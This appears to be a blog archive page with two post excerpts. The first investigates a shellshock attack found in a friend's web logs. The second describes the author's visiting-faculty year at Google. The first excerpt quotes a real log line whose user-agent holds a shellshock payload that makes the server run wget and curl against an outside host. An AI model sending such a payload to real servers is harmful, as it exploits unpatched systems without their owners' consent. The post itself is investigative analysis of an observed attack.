Posts

Showing posts from April, 2016

Indirect shellshock security scanning via other people's logfiles

Image
One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like:

24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

Seasonally-appropriate designer labels.  Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised and I should try to notify them? Hmm.  What the heck - try to download the page:

 --2016-04-30 13:38:26--  http://closettransfer.com/IPTRANSITTEST
Resolving closettransfer.com (closettrans…

Stealing Google's Coding Practices for Academia

Image
I'm spending the year in Google's Visiting Faculty program.  I had a few goals for my experience here:
Learn learn learn!  I hoped to get a different perspective from the inside of the largest collection of computing & distributed systems that the world has ever seen, and to learn enough about machine learning to think better about providing systems support for it.  I haven't been disappointed.Do some real engineering.  I spend most of my time as a faculty member teaching & mentoring my Ph.D. students in research.  I love this - it's terribly fun and working with fantastic students is an incredibly rewarding experience.  But I also get a lot of creative satisfaction from coding, and I can only carve out a bit of my faculty time to dedicate to it.  I haven't written large amounts of production code since I was 21 - and the world has changed a lot since then.  Contribute something useful to Google while I was here.  They're paying my salary for the time I&…